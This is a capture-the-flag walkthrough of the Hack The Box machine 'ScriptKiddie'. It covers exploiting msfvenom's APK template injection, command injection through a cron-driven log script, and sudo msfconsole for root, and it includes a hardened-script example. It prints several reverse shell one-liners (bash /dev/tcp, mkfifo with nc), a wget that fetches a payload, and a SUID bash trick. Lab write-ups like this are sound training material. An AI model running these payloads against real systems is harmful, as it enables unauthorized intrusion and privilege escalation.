
ScriptKiddie

T4r0 · 5 min read

https://www.hackthebox.eu/home/machines/profile/314

Summary

The foothold on this box is a known CVE in msfvenom's APK payload generation, which the web application on port 5000 exposes. Once we get a shell we already have the user flag. From there we do a horizontal privesc into another user via command injection in a scheduled script, then basic enumeration (sudo -l) to get root.

Exploring the target

First things first, after deploying the box and getting an IP, I started with an nmap scan. I usually run two nmap scans: one to quickly grab the open ports, then one to enumerate the running services in more detail, so I ran the following two commands:

nmap -sS -T4 -Pn <IP>

To grab the open ports, then:

nmap -sC -sV -Pn -T4 -p <PORTS I GOT FROM PREV SCAN> <IP>

To enumerate service versions (-sV) and run the default NSE scripts (-sC) against them.

This gave us the following result:
Nmap result

Foothold

Port 22 didn't seem interesting, so I moved on to port 5000. This is a Python web server, which isn't vulnerable itself, but the application hosted on it is. We are greeted by a page offering some 1337 h4x0r tools. After poking around for basic command injection and a bit of googling, I came across this exploit. The main hint that gave it away was that the page can generate APK payloads, which is unusual enough that I looked into it, and surprise surprise, it was the right path. The exploit abuses msfvenom's APK template handling: when msfvenom builds a payload from a user-supplied template APK, it reads the template's signing certificate and splices the certificate subject, unescaped, into the keytool command it runs to re-sign the output. A shell command planted in that subject therefore runs on the server as the user running msfvenom, so we have code execution!

I'll say it now: a straight-up reverse shell didn't work for me. Instead I had to save the bash reverse shell code to a file, upload it to the target, and run it that way.

We need to modify the payload in line 15 of the exploit script; that is the command that gets embedded in the template.

User

First I made a rev.sh file with the content:

#!/bin/bash
# IP and PORT are the attack box and the port our listener will be waiting on
bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'

Next we modify the exploit code to wget this revshell from our attack box:

wget IP/rev.sh -O /tmp/rev.sh

Let’s start a python http server:

python3 -m http.server 80

Now we run the exploit with python3. It generates a malicious msfvenom template (an APK) for us, which we then import on the website during payload generation; when the site runs msfvenom against it, the command we put on line 15 should run (we can confirm this by watching the Python http server logs for the request).
If successful, the exploit script writes the malicious APK to the /tmp folder, which we can use.

After this is done, let’s import the apk on the website.

Once we click generate, we can see the GET request to our python server.

Okay, our reverse shell script now sits in /tmp on the target. The next step is to generate another APK with the exploit, this time running the reverse shell script we just dropped there.
Let’s put the command into the exploit generator first:

bash /tmp/rev.sh

And let’s not forget to open a listener for the shell which will connect back to us:

rlwrap nc -lvnp 1337

We generate another evil.apk with our exploit python script, import it on the website and send the request. Shortly after this, we get back a shell as kid.

Let’s stabilize our shell a bit:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

If we go to our home directory, we can find user.txt there.

Root

After checking out the folders on the target we can see another user's home directory, called pwn. We have read privileges on some of the files in this directory, among them a script called scanlosers.sh. This script takes its input from a file at /home/kid/logs/hackers, which we can write to as kid, and it feeds that input into a shell command, so we have command injection and should be able to get a shell as pwn. I already suspected that this script runs automatically from time to time; to confirm it, I moved pspy onto the target and ran it to watch for process activity. This indeed confirmed my theory.
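To make the class of bug concrete, here is an added example (my own code, not the box's scanlosers.sh, whose exact contents the writeup does not reproduce): a constructed stand-in for the pattern described above, a log-driven loop that strips the first two fields of each line and splices the rest into an `sh -c` string, next to a hardened loop that validates the field and never re-parses it through a shell. The log lines, temp-file paths, the INJECTED marker and the use of `echo` in place of whatever command the real script runs against each entry are all assumptions made for the example.

```shell
#!/bin/sh
# Added example, not the box's scanlosers.sh: a constructed stand-in for a script that
# reads a log the low-privileged user can write, drops the first two fields (a timestamp)
# of each line and hands the remainder to "sh -c" inside a quoted command string.

LOG=$(mktemp)   # stand-in for the writable log file (assumed path)
OUT=$(mktemp)   # file the injected command writes to, so we can prove it ran
trap 'rm -f "$LOG" "$OUT"' EXIT

# Constructed sample log: one benign entry, one line whose third field carries a command.
printf '%s\n' \
  "[2021-02-06 10:00:01] 10.10.14.5" \
  "[2021-02-06 10:00:02] ;echo INJECTED >> $OUT #" > "$LOG"

# Vulnerable pattern: the untrusted field is spliced into a string that sh -c re-parses,
# so ';', '|' or '$(...)' in the log line become shell syntax running as the script's owner.
# "echo scanning" stands in for the real per-entry command.
vuln_scan() {
  cut -d' ' -f3- "$LOG" | while read -r ip; do
    sh -c "echo scanning ${ip}" >/dev/null
  done
}

# Hardened: accept only the shape the field may legitimately have (a dotted quad) and pass
# it as its own argument, so nothing is ever re-parsed by a shell. Accepted entries go to
# stdout, rejected lines to stderr.
safe_scan() {
  cut -d' ' -f3- "$LOG" | while read -r ip; do
    if printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'; then
      echo "$ip"
    else
      echo "rejected: $ip" >&2
    fi
  done
}

# Returns 0 if the injected command left its marker in $OUT, 1 otherwise.
injection_fired() { grep -q INJECTED "$OUT"; }

# Empties the marker file between runs.
reset_marker() { : > "$OUT"; }

# Demo: the vulnerable loop executes the planted command, the hardened loop does not.
vuln_scan
injection_fired && echo "vulnerable loop: injected command ran"
reset_marker
safe_scan >/dev/null 2>&1
injection_fired || echo "hardened loop: injected command did not run"
```

The fix is not quoting `${ip}` harder inside the string: as long as the value is re-parsed by `sh -c`, an attacker who controls it controls the command line. Validate the value against the only shape it should have and pass it as an argument instead.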

Have to take note that the box has some weird anomalies. The method I used for command injection when the box came out didn't work when I did my writeup and retried the box. The second method also didn't work when my friend did the box the third time, so I found another working method. All three methods are listed below.

The first time, I used:

echo '/bin/sh -i |rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1337 >/tmp/f' >> hackers

The one I used the second time I did the box:

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #" >> hackers

Initially these methods gave me a reverse shell immediately as pwn, but staff or the box creator probably modified the box several times, or at least stuff that used to work fine didn't work anymore. My third method was to copy bash and make it SUID:

# run by the scheduled script as pwn: copies bash into /home/pwn and sets the SUID/SGID bits
echo '/bin/sh -i |cp /bin/bash ~/; chmod +s ~/bash' >> hackers
# wait until the copy shows up with the s bits set
ls -la /home/pwn
# -p keeps the effective UID (pwn) instead of dropping back to the real UID
/home/pwn/bash -p

Then do:

cd /home/pwn
# build run.sh with >> so the shebang survives (> on every line would leave only the last line)
echo '#!/bin/bash' > run.sh
echo ' ' >> run.sh
echo 'bash -i >& /dev/tcp/10.10.14.203/4545 0>&1' >> run.sh
chmod +x run.sh
cd /home/kid/logs
# the scheduled script picks this up and runs run.sh as pwn
echo '/bin/sh -i |bash /home/pwn/run.sh' > hackers

Had to do this because sitting in a SUID bash as another user doesn't let us run sudo: sudo checks the real UID, which is still kid even though the effective UID is pwn. So I had to go through the longer route of getting an actual shell back as pwn.

I ran sudo -l and saw that we can run msfconsole as root. You can execute OS commands from inside msfconsole, so let's start it and get a root shell.

sudo /opt/metasploit-framework-6.0.9/msfconsole

Then, at the msfconsole prompt, run

/bin/bash

We are root!

Written by T4r0, Penetration Tester